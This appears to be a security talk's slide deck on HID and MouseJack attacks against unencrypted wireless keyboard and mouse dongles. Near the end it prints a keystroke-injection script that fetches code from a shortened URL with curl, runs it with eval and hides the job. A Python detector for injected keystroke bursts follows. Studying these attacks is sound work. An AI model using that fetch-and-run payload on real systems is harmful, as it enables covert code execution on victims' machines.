HID Attack

Cesena Security Network and Application

Human Interface Device

A human interface device (HID) is a type of computer device that is used directly by humans: it takes input from, and gives output to, a person.


The term "HID" most commonly refers to the USB-HID specification.
The term was coined by Mike Van Flandern of Microsoft when he proposed that the USB committee create a Human Input Device class working group.

HID Attack

Rubber Ducky

Bash Bunny

MouseJack

Vulnerabilities affecting non-Bluetooth wireless mice and keyboards, discovered by Marc Newlin of the Bastille Threat Research Team.


https://www.bastille.net/

https://www.mousejack.com/


These vulnerabilities enable an attacker to type arbitrary commands into a victim's machine through its USB dongle.

Why

Wireless mice and keyboards communicate using proprietary protocols operating in the 2.4 GHz ISM band (Industrial, Scientific, Medical):


there is no standard to follow


Each vendor can implement its own security scheme.

Why

In order to prevent eavesdropping, most vendors encrypt the data transmitted by the keyboard. The dongle holds the encryption key used by the keyboard, so it is able to decrypt the data and pass the payload on to the computer.

Without knowing the encryption key, an attacker is unable to decrypt the data, and so cannot see what is being typed.

but....

MouseJack

Some mice tested by the Bastille team do not implement this kind of encryption: this means there is no authentication mechanism, and the dongle is unable to distinguish between packets transmitted by a mouse and those transmitted by an attacker (or a researcher).

Not very useful to just press a mouse button...

MouseJack

Researcher discovered that the dongles can also process specially crafted packets which generate keypresses instead of mouse movement/clicks.

MouseJack

- keystroke injection, spoofing a mouse

- keystroke injection, spoofing a keyboard

- forced pair

 

How

The nRF24L transceivers used by 2.4 GHz devices support multiple data rates, address lengths, packet formats and checksums. SDR devices, by contrast, turned out to be slower, less configurable and less able to observe all the transmitted packets: when a mouse transmits a packet to a dongle, the dongle replies with an ACK packet within 250 microseconds.

How

Crazyradio PA by Bitcraze is an open-source, amplified nRF24L-based USB dongle: effectively an amplified version of the common USB dongle shipped with mice and keyboards.

- pseudo-promiscuous mode
- packet sniffing
- packet injection
- easy interface

30 € on Amazon...

Attack

Real Attack

- choose victim

- gather information

- write exploit

- profit

Real Attack

- choose a victim with a possibly unpatched/vulnerable device

Real Attack

- gather information about the OS, key bindings, installed tools, etc.

Real Attack

- write exploit

DELAY 1000
GUI-SHIFT ENTER
DELAY 800
STRING (x=$(\curl -sL http://bit.ly/2yOCGw8);eval $x)&;disown %1;exit
ENTER

- JackIt

https://github.com/insecurityofthings/jackit
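The injected STRING above arrives at machine speed right after a DELAY, and that timing is what a host-side defence can key on. The following detector is an added example written for this page, not code from the slides or from JackIt; the thresholds and the key-event log are constructed assumptions, and a real deployment would read timestamps from the OS input layer.

```python
"""Host-side detector for keystroke-injection bursts (added example)."""
from dataclasses import dataclass

# Thresholds are assumptions chosen for this example, not values from the slides.
MAX_HUMAN_GAP_MS = 30.0   # consecutive keys closer than this are faster than human typing
MIN_BURST_KEYS = 8        # how many such keys in a row before we report a burst


@dataclass
class KeyEvent:
    ts_ms: float   # arrival time of the key event, in milliseconds
    key: str       # character produced by the key


def find_injection_bursts(events, max_gap_ms=MAX_HUMAN_GAP_MS, min_keys=MIN_BURST_KEYS):
    """Return (start_ms, end_ms, text) for every run of at least min_keys
    key events whose consecutive gaps are all <= max_gap_ms.

    A DELAY between two injected STRINGs breaks the run, so each STRING is
    reported as its own burst; human typing never reaches min_keys."""
    bursts = []
    run = events[:1]
    for prev, cur in zip(events, events[1:]):
        if cur.ts_ms - prev.ts_ms <= max_gap_ms:
            run.append(cur)
            continue
        if len(run) >= min_keys:
            bursts.append((run[0].ts_ms, run[-1].ts_ms, "".join(e.key for e in run)))
        run = [cur]
    if len(run) >= min_keys:
        bursts.append((run[0].ts_ms, run[-1].ts_ms, "".join(e.key for e in run)))
    return bursts


def constructed_log():
    """Constructed sample: a person types 'hello' at 150 ms per key, then after
    a 1000 ms pause a dongle delivers a 20-character string at 5 ms per key."""
    events, t = [], 0.0
    for ch in "hello":
        events.append(KeyEvent(t, ch))
        t += 150.0
    t += 1000.0  # the DELAY that precedes the injected STRING
    for ch in "INJECTED-PLACEHOLDER":
        events.append(KeyEvent(t, ch))
        t += 5.0
    return events


if __name__ == "__main__":
    for start, end, text in find_injection_bursts(constructed_log()):
        print(f"burst {start:.0f}-{end:.0f} ms ({len(text)} keys): {text!r}")
```

On the constructed log the human-typed "hello" is ignored and the 20-key burst is reported as one event, which is the granularity at which a host agent could block or alert on the input device.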

Source

HID Attack

By Edoardo Rosa
